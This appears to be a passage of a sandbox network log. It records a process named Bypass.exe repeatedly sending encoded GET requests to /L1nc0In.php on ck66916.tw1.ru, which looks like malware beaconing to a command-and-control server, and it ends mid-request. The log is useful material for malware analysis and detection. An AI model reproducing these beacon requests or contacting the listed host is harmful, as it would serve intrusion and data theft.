Jun 23, 2024 06:57:08.414673090 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49781	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:13.436690092 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:57:14.127618074 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49782	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:19.136914015 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:57:19.835242987 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49783	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:24.857641935 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:57:25.557725906 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49784	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:30.574831009 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:57:31.268132925 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49785	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:36.277936935 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:57:37.000525951 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49786	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:42.012749910 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:57:42.723964930 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49787	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:47.747111082 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:57:48.455339909 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49788	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:53.480514050 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:57:54.204020977 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49789	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:59.215189934 CEST	2196	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN